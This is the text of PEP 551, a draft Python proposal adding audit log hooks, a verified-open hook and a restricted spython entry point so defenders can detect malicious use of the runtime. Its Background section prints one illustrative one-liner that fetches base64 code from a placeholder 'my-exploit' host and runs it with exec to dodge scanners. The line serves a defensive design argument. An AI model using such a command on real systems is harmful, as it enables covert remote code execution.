625 lines
31 KiB
ReStructuredText
625 lines
31 KiB
ReStructuredText
PEP: 551
|
||
Title: Security transparency in the Python runtime
|
||
Version: $Revision$
|
||
Last-Modified: $Date$
|
||
Author: Steve Dower <steve.dower@python.org>
|
||
Status: Draft
|
||
Type: Standards Track
|
||
Content-Type: text/x-rst
|
||
Created: 23-Aug-2017
|
||
Python-Version: 3.7
|
||
Post-History: 24-Aug-2017 (security-sig)
|
||
|
||
Abstract
|
||
========
|
||
|
||
This PEP describes additions to the Python API and specific behaviors for the
|
||
CPython implementation that make actions taken by the Python runtime visible to
|
||
security and auditing tools. The goals in order of increasing importance are to
|
||
prevent malicious use of Python, to detect and report on malicious use, and most
|
||
importantly to detect attempts to bypass detection. Most of the responsibility
|
||
for implementation is required from users, who must customize and build Python
|
||
for their own environment.
|
||
|
||
We propose two small sets of public APIs to enable users to reliably build their
|
||
copy of Python without having to modify the core runtime, protecting future
|
||
maintainability. We also discuss recommendations for users to help them develop
|
||
and configure their copy of Python.
|
||
|
||
Background
|
||
==========
|
||
|
||
Software vulnerabilities are generally seen as bugs that enable remote or
|
||
elevated code execution. However, in our modern connected world, the more
|
||
dangerous vulnerabilities are those that enable advanced persistent threats
|
||
(APTs). APTs are achieved when an attacker is able to penetrate a network,
|
||
establish their software on one or more machines, and over time extract data or
|
||
intelligence. Some APTs may make themselves known by maliciously damaging data
|
||
(e.g., `WannaCrypt <https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
|
||
or hardware (e.g., `Stuxnet <https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
|
||
Most attempt to hide their existence and avoid detection. APTs often use a
|
||
combination of traditional vulnerabilities, social engineering, phishing (or
|
||
spear-phishing), thorough network analysis, and an understanding of
|
||
misconfigured environments to establish themselves and do their work.
|
||
|
||
The first infected machines may not be the final target and may not require
|
||
special privileges. For example, an APT that is established as a
|
||
non-administrative user on a developer’s machine may have the ability to spread
|
||
to production machines through normal deployment channels. It is common for APTs
|
||
to persist on as many machines as possible, with sheer weight of presence making
|
||
them difficult to remove completely.
|
||
|
||
Whether an attacker is seeking to cause direct harm or hide their tracks, the
|
||
biggest barrier to detection is a lack of insight. System administrators with
|
||
large networks rely on distributed logs to understand what their machines are
|
||
doing, but logs are often filtered to show only error conditions. APTs that are
|
||
attempting to avoid detection will rarely generate errors or abnormal events.
|
||
Reviewing normal operation logs involves a significant amount of effort, though
|
||
work is underway by a number of companies to enable automatic anomaly detection
|
||
within operational logs. The tools preferred by attackers are ones that are
|
||
already installed on the target machines, since log messages from these tools
|
||
are often expected and ignored in normal use.
|
||
|
||
At this point, we are not going to spend further time discussing the existence
|
||
of APTs or methods and mitigations that do not apply to this PEP. For further
|
||
information about the field, we recommend reading or watching the resources
|
||
listed under `Further Reading`_.
|
||
|
||
Python is a particularly interesting tool for attackers due to its prevalence on
|
||
server and developer machines, its ability to execute arbitrary code provided as
|
||
data (as opposed to native binaries), and its complete lack of internal logging.
|
||
This allows attackers to download, decrypt, and execute malicious code with a
|
||
single command::
|
||
|
||
python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"
|
||
|
||
This command currently bypasses most anti-malware scanners that rely on
|
||
recognizable code being read through a network connection or being written to
|
||
disk (base64 is often sufficient to bypass these checks). It also bypasses
|
||
protections such as file access control lists or permissions (no file access
|
||
occurs), approved application lists (assuming Python has been approved for other
|
||
uses), and automated auditing or logging (assuming Python is allowed to access
|
||
the internet or access another machine on the local network from which to obtain
|
||
its payload).
|
||
|
||
General consensus among the security community is that totally preventing
|
||
attacks is infeasible and defenders should assume that they will often detect
|
||
attacks only after they have succeeded. This is known as the "assume breach"
|
||
mindset. [1]_ In this scenario, protections such as sandboxing and input
|
||
validation have already failed, and the important task is detection, tracking,
|
||
and eventual removal of the malicious code. To this end, the primary feature
|
||
required from Python is security transparency: the ability to see what
|
||
operations the Python runtime is performing that may indicate anomalous or
|
||
malicious use. Preventing such use is valuable, but secondary to the need to
|
||
know that it is occurring.
|
||
|
||
To summarise the goals in order of increasing importance:
|
||
|
||
* preventing malicious use is valuable
|
||
* detecting malicious use is important
|
||
* detecting attempts to bypass detection is critical
|
||
|
||
One example of a scripting engine that has addressed these challenges is
|
||
PowerShell, which has recently been enhanced towards similar goals of
|
||
transparency and prevention. [2]_
|
||
|
||
Generally, application and system configuration will determine which events
|
||
within a scripting engine are worth logging. However, given the value of many
|
||
logs events are not recognized until after an attack is detected, it is
|
||
important to capture as much as possible and filter views rather than filtering
|
||
at the source (see the No Easy Breach video from above). Events that are always
|
||
of interest include attempts to bypass event logging, attempts to load and
|
||
execute code that is not correctly signed or access-controlled, use of uncommon
|
||
operating system functionality such as debugging or inter-process inspection
|
||
tools, most network access and DNS resolution, and attempts to create and hide
|
||
files or configuration settings on the local machine.
|
||
|
||
To summarize, defenders have a need to audit specific uses of Python in order to
|
||
detect abnormal or malicious usage. Currently, the Python runtime does not
|
||
provide any ability to do this, which (anecdotally) has led to organizations
|
||
switching to other languages. The aim of this PEP is to enable system
|
||
administrators to deploy a security transparent copy of Python that can
|
||
integrate with their existing auditing and protection systems.
|
||
|
||
On Windows, some specific features that may be enabled by this include:
|
||
|
||
* Script Block Logging [3]_
|
||
* DeviceGuard [4]_
|
||
* AMSI [5]_
|
||
* Persistent Zone Identifiers [6]_
|
||
* Event tracing (which includes event forwarding) [7]_
|
||
|
||
On Linux, some specific features that may be integrated are:
|
||
|
||
* gnupg [8]_
|
||
* sd_journal [9]_
|
||
* OpenBSM [10]_
|
||
* syslog [11]_
|
||
* auditd [12]_
|
||
* check execute bit on imported modules
|
||
|
||
|
||
On macOS, some features that may be used with the expanded APIs are:
|
||
|
||
* OpenBSM [10]_
|
||
* syslog [11]_
|
||
|
||
Overall, the ability to enable these platform-specific features on production
|
||
machines is highly appealing to system administrators and will make Python a
|
||
more trustworthy dependency for application developers.
|
||
|
||
|
||
Overview of Changes
|
||
===================
|
||
|
||
True security transparency is not fully achievable by Python in isolation. The
|
||
runtime can log as many events as it likes, but unless the logs are reviewed and
|
||
analyzed there is no value. Python may impose restrictions in the name of
|
||
security, but usability may suffer. Different platforms and environments will
|
||
require different implementations of certain security features, and
|
||
organizations with the resources to fully customize their runtime should be
|
||
encouraged to do so.
|
||
|
||
The aim of these changes is to enable system administrators to integrate Python
|
||
into their existing security systems, without dictating what those systems look
|
||
like or how they should behave. We propose two API changes to enable this: an
|
||
Event Log Hook and Verified Open Hook. Both are not set by default, and both
|
||
require modifying the appropriate entry point to enable any functionality. For
|
||
the purposes of validation and example, we propose a new spython/spython.exe
|
||
entry point program that enables some basic functionality using these hooks.
|
||
However, the expectation is that security-conscious organizations will create
|
||
their own entry points to meet their needs.
|
||
|
||
Event Log Hook
|
||
--------------
|
||
|
||
In order to achieve security transparency, an API is required to raise messages
|
||
from within certain operations. These operations are typically deep within the
|
||
Python runtime or standard library, such as dynamic code compilation, module
|
||
imports, DNS resolution, or use of certain modules such as ``ctypes``.
|
||
|
||
The new APIs required for log hooks are::
|
||
|
||
# Add a logging hook
|
||
sys.addloghook(hook: Callable[str, tuple]) -> None
|
||
int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
|
||
|
||
# Raise an event with all logging hooks
|
||
sys.loghook(str, *args) -> None
|
||
int PySys_LogHook(const char *event, PyObject *args);
|
||
|
||
# Internal API used during Py_Finalize() - not publicly accessible
|
||
void _Py_ClearLogHooks(void);
|
||
|
||
Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
|
||
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
|
||
Hooks are never removed or replaced, and existing hooks have an opportunity to
|
||
refuse to allow new hooks to be added (adding a logging hook is logged, and so
|
||
preexisting hooks can raise an exception to block the new addition).
|
||
|
||
When events of interest are occurring, code can either call ``PySys_LogHook()``
|
||
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
|
||
name of the event, and the tuple contains arguments. A given event name should
|
||
have a fixed schema for arguments, and both arguments are considered a public
|
||
API (for a given x.y version of Python), and thus should only change between
|
||
feature releases with updated documentation.
|
||
|
||
When an event is logged, each hook is called in the order it was added with the
|
||
event name and tuple. If any hook returns with an exception set, later hooks are
|
||
ignored and *in general* the Python runtime should terminate. This is
|
||
intentional to allow hook implementations to decide how to respond to any
|
||
particular event. The typical responses will be to log the event, abort the
|
||
operation with an exception, or to immediately terminate the process with an
|
||
operating system exit call.
|
||
|
||
When an event is logged but no hooks have been set, the ``loghook()`` function
|
||
should include minimal overhead. Ideally, each argument is a reference to
|
||
existing data rather than a value calculated just for the logging call.
|
||
|
||
As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
|
||
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
|
||
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
|
||
internal function with no public export, but it passes an event to all existing
|
||
hooks to ensure that unexpected calls are logged.
|
||
|
||
See `Log Hook Locations`_ for proposed log hook points and schemas, and the
|
||
`Recommendations`_ section for discussion on appropriate responses.
|
||
|
||
Verified Open Hook
|
||
------------------
|
||
|
||
Most operating systems have a mechanism to distinguish between files that can be
|
||
executed and those that can not. For example, this may be an execute bit in the
|
||
permissions field, or a verified hash of the file contents to detect potential
|
||
code tampering. These are an important security mechanism for preventing
|
||
execution of data or code that is not approved for a given environment.
|
||
Currently, Python has no way to integrate with these when launching scripts or
|
||
importing modules.
|
||
|
||
The new public API for the verified open hook is::
|
||
|
||
# Set the handler
|
||
int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide))
|
||
|
||
# Open a file using the handler
|
||
os.open_for_exec(pathlike)
|
||
|
||
The ``os.open_for_exec()`` function is a drop-in replacement for
|
||
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
|
||
binary access - any more restrictive behaviour requires the use of a custom
|
||
handler. (Aside: since ``importlib`` requires access to this function before the
|
||
``os`` module has been imported, it will be available on the ``nt``/``posix``
|
||
modules, but the intent is that other users will access it through the ``os``
|
||
module.)
|
||
|
||
A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C
|
||
at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is
|
||
called with a handler set, the handler will be passed the processed narrow or
|
||
wide path, depending on platform, and its return value will be returned
|
||
directly. The returned object should be an open file-like object that supports
|
||
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance
|
||
if the open handler has already had to read the file into memory in order to
|
||
perform whatever verification is necessary to determine whether the content is
|
||
permitted to be executed.
|
||
|
||
Note that these handlers can import and call the ``_io.open()`` function on
|
||
CPython without triggering themselves.
|
||
|
||
If the handler determines that the file is not suitable for execution, it should
|
||
raise an exception of its choice, as well as performing any other logging or
|
||
notifications.
|
||
|
||
All import and execution functionality involving code from a file will be
|
||
changed to use ``open_for_exec()`` unconditionally. It is important to note that
|
||
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
|
||
function - a log hook that includes the code from these calls will be added and
|
||
is the best opportunity to validate code that is read from the file. Given the
|
||
current decoupling between import and execution in Python, most imported code
|
||
will go through both ``open_for_exec()`` and the log hook for ``compile``, and
|
||
so care should be taken to avoid repeating verification steps.
|
||
|
||
API Availability
|
||
----------------
|
||
|
||
While all the functions added here are considered public and stable API, the
|
||
behavior of the functions is implementation specific. The descriptions here
|
||
refer to the CPython implementation, and while other implementations should
|
||
provide the functions, there is no requirement that they behave the same.
|
||
|
||
For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may do
|
||
nothing. This allows code to make calls to ``sys.loghook()`` without having to
|
||
test for existence, but it should not assume that its call will have any effect.
|
||
(Including existence tests in security-critical code allows another vector to
|
||
bypass logging, so it is preferable that the function always exist.)
|
||
|
||
``os.open_for_exec()`` should at a minimum always return ``_io.open(pathlike,
|
||
'rb')``. Code using the function should make no further assumptions about what
|
||
may occur, and implementations other than CPython are not required to let
|
||
developers override the behavior of this function with a hook.
|
||
|
||
|
||
Log Hook Locations
|
||
==================
|
||
|
||
Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the following
|
||
operations with the schema in Table 1. Unless otherwise specified, the ability
|
||
for log hooks to abort any listed operation should be considered part of the
|
||
rationale for including the hook.
|
||
|
||
.. csv-table:: Table 1: Log Hooks
|
||
:header: "API Function", "Event Name", "Arguments", "Rationale"
|
||
:widths: 2, 2, 3, 6
|
||
|
||
``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
|
||
being added."
|
||
``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they
|
||
are being cleaned up, mainly in case the event is triggered unexpectedly.
|
||
This event cannot be aborted."
|
||
``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
|
||
any attempt to set the ``open_for_execute`` handler."
|
||
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
|
||
``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
|
||
this will also be called for regular imports of source code, including those
|
||
that used ``open_for_exec``."
|
||
``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
|
||
sys.path_hooks)``", "Detect when modules are imported. This is raised before
|
||
the module name is resolved to a file. All arguments other than the module
|
||
name may be ``None`` if they are not used or available."
|
||
"``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
|
||
``(module_or_path,)``", "Detect when native modules are used."
|
||
``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
|
||
information about specific symbols retrieved from native modules."
|
||
``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code
|
||
is accessing arbitrary memory using ``ctypes``"
|
||
``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of
|
||
objects, which in CPython reveals information about memory layout."
|
||
``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
|
||
code is accessing frames directly"
|
||
``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is
|
||
accessing frames directly"
|
||
``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is injecting
|
||
trace functions. Because of the implementation, exceptions raised from the
|
||
hook will abort the operation, but will not be raised in Python code. Note
|
||
that ``threading.setprofile`` eventually calls this function, so the event
|
||
will be logged for each thread."
|
||
``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
|
||
trace functions. Because of the implementation, exceptions raised from the
|
||
hook will abort the operation, but will not be raised in Python code. Note
|
||
that ``threading.settrace`` eventually calls this function, so the event
|
||
will be logged for each thread."
|
||
``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
|
||
Detect changes to async generator hooks."
|
||
``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
|
||
Detect changes to async generator hooks."
|
||
``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect
|
||
changes to the coroutine wrapper."
|
||
``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "
|
||
Detect changes to the recursion limit."
|
||
``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "``(interval_us,)``
|
||
", "Detect changes to the switching interval."
|
||
"``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
|
||
``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``,
|
||
``socket.sendto``", ``socket.address``, "``(address,)``", "Detect access to
|
||
network resources. The address is unmodified from the original call."
|
||
``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
|
||
creation of sockets. The arguments will be int values."
|
||
``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
|
||
retrieve the current host name."
|
||
``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
|
||
attempts to change the current host name. The name argument is passed as a
|
||
bytes object."
|
||
"``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
|
||
``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The
|
||
name argument is a str or bytes object."
|
||
``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect
|
||
host resolution. The address argument is a str or bytes object."
|
||
``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", "
|
||
Detect service resolution. The arguments are str objects."
|
||
``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "
|
||
Detect service resolution. The port argument is an int and protocol is a
|
||
str."
|
||
|
||
TODO - more hooks in ``_socket``, ``_ssl``, others?
|
||
|
||
|
||
SPython Entry Point
|
||
===================
|
||
|
||
A new entry point binary will be added, called ``spython.exe`` on Windows and
|
||
``spythonX.Y`` on other platforms. This entry point is intended primarily as an
|
||
example, as we expect most users of this functionality to implement their own
|
||
entry point and hooks (see `Recommendations`_). It will also be used for tests.
|
||
|
||
Source builds will create ``spython`` by default, but distributors may choose
|
||
whether to include ``spython`` in their pre-built packages. The python.org
|
||
managed binary distributions will not include ``spython``.
|
||
|
||
**Do not accept most command-line arguments**
|
||
|
||
The ``spython`` entry point requires a script file be passed as the first
|
||
argument, and does not allow any options. This prevents arbitrary code execution
|
||
from in-memory data or non-script files (such as pickles, which can be executed
|
||
using ``-m pickle <path>``.
|
||
|
||
Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
|
||
and ``-s`` (no user site) are assumed.
|
||
|
||
If a file with the same full path as the process with a ``._pth`` suffix
|
||
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be
|
||
used to initialize ``sys.path`` following the rules currently described `for
|
||
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
|
||
|
||
When built with ``Py_DEBUG``, the ``spython`` entry point will allow a ``-i``
|
||
option with no other arguments to enter into interactive mode, with log messages
|
||
being written to standard error rather than a file. This is intended for testing
|
||
and debugging only.
|
||
|
||
**Log security events to a file**
|
||
|
||
Before initialization, ``spython`` will set a log hook that writes events to a
|
||
local file. By default, this file is the full path of the process with a
|
||
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
|
||
variable (despite such overrides being explicitly discouraged in
|
||
`Recommendations`_).
|
||
|
||
The log hook will also abort all ``addloghook`` events, preventing any other
|
||
hooks from being added.
|
||
|
||
On Windows, code from ``compile`` events will submitted to AMSI [5]_ and if it
|
||
fails to validate, the compile event will be aborted. This can be tested by
|
||
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
|
||
<http://www.eicar.org/86-0-Intended-use.html>`_.
|
||
|
||
**Restrict importable modules**
|
||
|
||
Also before initialization, ``spython`` will set an open-for-execute hook that
|
||
validates all files opened with ``os.open_for_exec``. This implementation will
|
||
require all files to have a ``.py`` suffix (thereby blocking the use of cached
|
||
bytecode), and will raise a custom log message ``spython.open_for_exec``
|
||
containing ``(filename, True_if_allowed)``.
|
||
|
||
On Windows, the hook will also open the file with flags that prevent any other
|
||
process from opening it with write access, which allows the hook to perform
|
||
additional validation on the contents with confidence that it will not be
|
||
modified between the check and use. Compilation will later trigger a ``compile``
|
||
event, so there is no need to read the contents now for AMSI, but other
|
||
validation mechanisms such as DeviceGuard [4]_ should be performed here.
|
||
|
||
|
||
Performance Impact
|
||
==================
|
||
|
||
**TODO**
|
||
|
||
Full impact analysis still requires investigation. Preliminary testing shows
|
||
that calling ``sys.loghook`` with no hooks added does not significantly affect
|
||
any existing benchmarks, though targeted microbenchmarks can observe an impact.
|
||
|
||
Performance impact using ``spython`` or with hooks added are not of interest
|
||
here, since this is considered opt-in functionality.
|
||
|
||
|
||
Recommendations
|
||
===============
|
||
|
||
Specific recommendations are difficult to make, as the ideal configuration for
|
||
any environment will depend on the user's ability to manage, monitor, and
|
||
respond to activity on their own network. However, many of the proposals here do
|
||
not appear to be of value without deeper illustration. This section provides
|
||
recommendations using the terms **should** (or **should not**), indicating that
|
||
we consider it dangerous to ignore the advice, and **may**, indicating that for
|
||
the advice ought to be considered for high value systems. The term **sysadmins**
|
||
refers to whoever is responsible for deploying Python throughout your network;
|
||
different organizations may have an alternative title for the responsible
|
||
people.
|
||
|
||
Sysadmins **should** build their own entry point, likely starting from the
|
||
``spython`` source, and directly interface with the security systems available
|
||
in their environment. The more tightly integrated, the less likely a
|
||
vulnerability will be found allowing an attacker to bypass those systems. In
|
||
particular, the entry point **should not** obtain any settings from the current
|
||
environment, such as environment variables, unless those settings are otherwise
|
||
protected from modification.
|
||
|
||
Log messages **should not** be written to a local file. The ``spython`` entry
|
||
point does this for example and testing purposes. On production machines, tools
|
||
such as ETW [7]_ or auditd [12]_ that are intended for this purpose should be
|
||
used.
|
||
|
||
The default ``python`` entry point **should not** be deployed to production
|
||
machines, but could be given to developers to use and test Python on
|
||
non-production machines. Sysadmins **may** consider deploying a less restrictive
|
||
version of their entry point to developer machines, since any system connected
|
||
to your network is a potential target.
|
||
|
||
Python deployments **should** be made read-only using any available platform
|
||
functionality after deployment and during use.
|
||
|
||
On platforms that support it, sysadmins **should** include signatures for every
|
||
file in a Python deployment, ideally verified using a private certificate. For
|
||
example, Windows supports embedding signatures in executable files and using
|
||
catalogs for others, and can use DeviceGuard [4]_ to validate signatures either
|
||
automatically or using an ``open_for_exec`` hook.
|
||
|
||
Sysadmins **should** collect as many logged events as possible, and **should**
|
||
copy them off of local machines frequently. Even if logs are not being
|
||
constantly monitored for suspicious activity, once an attack is detected it is
|
||
too late to enable logging. Log hooks **should not** attempt to preemptively
|
||
filter events, as even benign events are useful when analyzing the progress of
|
||
an attack. (Watch the "No Easy Breach" video under `Further Reading`_ for a
|
||
deeper look at this side of things.)
|
||
|
||
Log hooks **should** write events to logs before attempting to abort. As
|
||
discussed earlier, it is more important to record malicious actions than to
|
||
prevent them.
|
||
|
||
Most actions **should not** be aborted if they could ever occur during normal
|
||
use or if preventing them will encourage attackers to work around them. As
|
||
described earlier, awareness is a higher priority than prevention. Sysadmins
|
||
**may** audit their Python code and abort operations that are known to never be
|
||
used deliberately.
|
||
|
||
On production machines, the first log hook **should** be set in C code before
|
||
``Py_Initialize`` is called, and that hook **should** unconditionally abort the
|
||
``sys.addloghook`` event. The Python interface is mainly useful for testing.
|
||
|
||
To prevent log hooks being added on non-production machines, the entry point
|
||
**may** add a log hook that aborts the ``sys.addloghook`` event but otherwise
|
||
does nothing.
|
||
|
||
On production machines, a non-validating ``open_for_exec`` hook **may** be set
|
||
in C code before ``Py_Initialize`` is called. This prevents later code from
|
||
overriding the hook, however, logging the ``setopenforexecutehandler`` event is
|
||
useful since no code should ever need to call it. Using at least the sample
|
||
``open_for_exec`` hook implementation from ``spython`` is recommended.
|
||
|
||
[TODO: more good advice; less bad advice]
|
||
|
||
Further Reading
|
||
===============
|
||
|
||
|
||
**Redefining Malware: When Old Terms Pose New Threats**
|
||
By Aviv Raff for SecurityWeek, 29th January 2014
|
||
|
||
This article, and those linked by it, are high-level summaries of the rise of
|
||
APTs and the differences from "traditional" malware.
|
||
|
||
`<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_
|
||
|
||
**Anatomy of a Cyber Attack**
|
||
By FireEye, accessed 23rd August 2017
|
||
|
||
A summary of the techniques used by APTs, and links to a number of relevant
|
||
whitepapers.
|
||
|
||
`<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_
|
||
|
||
**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
|
||
By Aviv Raff for SecurityWeek, 8th May 2014
|
||
|
||
High-level summary of the value of detailed logging and automatic analysis.
|
||
|
||
`<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_
|
||
|
||
**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
|
||
Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016
|
||
|
||
Detailed walkthrough of the processes and tools used in detecting and removing
|
||
an APT.
|
||
|
||
`<https://archive.org/details/No_Easy_Breach>`_
|
||
|
||
**Disrupting Nation State Hackers**
|
||
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
|
||
|
||
Good security practices, capabilities and recommendations from the chief of
|
||
NSA's Tailored Access Operation.
|
||
|
||
`<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_
|
||
|
||
References
|
||
==========
|
||
|
||
.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
|
||
|
||
.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
|
||
Protection Advances in Windows 10, `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_
|
||
|
||
.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_
|
||
|
||
.. [4] `<https://aka.ms/deviceguard>`_
|
||
|
||
.. [5] AMSI, `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_
|
||
|
||
.. [6] Persistent Zone Identifiers, `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_
|
||
|
||
.. [7] Event tracing, `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_
|
||
|
||
.. [8] `<https://www.gnupg.org/>`_
|
||
|
||
.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
|
||
|
||
.. [10] `<http://www.trustedbsd.org/openbsm.html>`_
|
||
|
||
.. [11] `<https://linux.die.net/man/3/syslog>`_
|
||
|
||
.. [12] `<http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/>`_
|
||
|
||
Acknowledgments
|
||
===============
|
||
|
||
Thanks to all the people from Microsoft involved in helping make the Python
|
||
runtime safer for production use, and especially to James Powell for doing much
|
||
of the initial research, analysis and implementation, Lee Holmes for invaluable
|
||
insights into the info-sec field and PowerShell's responses, and Brett Cannon
|
||
for the grounding discussions.
|
||
|
||
Copyright
|
||
=========
|
||
|
||
Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
|
||
only subject to the terms and conditions set forth in the Open Publication
|
||
License, v1.0 or later (the latest version is presently available at
|
||
http://www.opencontent.org/openpub/).
|